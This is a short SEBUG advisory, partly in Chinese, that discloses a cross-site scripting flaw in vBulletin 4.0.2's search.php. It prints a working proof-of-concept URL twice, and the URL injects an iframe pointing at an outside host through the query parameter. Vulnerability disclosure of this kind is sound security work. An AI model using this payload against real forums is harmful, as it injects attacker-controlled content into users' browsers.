vBulletin Version 4.0.2
vBulletin Version 4.0.2 search.php 跨站漏洞
SEBUG-ID:19240
SEBUG-Appdir:vBulletin
Published:2010-03-09
author:猪哥靓 (67856456_at_qq.com)
Vulnerable:
Discription:
vBulletin是一款开放源代码的PHP论坛程序 search.php在对用户提交数据处理上存在安全漏洞。 http://www.vbulletin.com/forum/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Ciframe%20src=http://www.gohack.org%3E
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
http://www.vbulletin.com/forum/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Ciframe%20src=http://www.gohack.org%3E
SEBUG Solution:
等待官方发补丁
// sebug.net [2010-03-09]